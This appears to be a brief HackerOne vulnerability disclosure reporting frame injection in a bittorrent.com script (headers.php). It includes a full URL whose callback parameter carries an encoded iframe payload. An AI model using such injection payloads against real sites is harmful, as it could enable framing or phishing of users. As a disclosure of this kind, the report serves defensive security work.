frame injection on bittorrent.com

Disclosed: 2020-05-05 20:51:13 By aslanemre To btfs
Medium
Vulnerability Details
Hi team, headers.php is injectable. you can see on IE browsers. FULL URL : https://www.bittorrent.com/scripts/site/headers.php?_=1586521900793&callback=%3ciframe%20src%3d%22http%3a%2f%2fgoogle.com%2f%3f%22%3e%3c%2fiframe%3e ## Impact fix them
Actions
View on HackerOne
Report Stats
  • Report ID: 846430
  • State: Closed
  • Substate: informative
  • Upvotes: 5
Share this report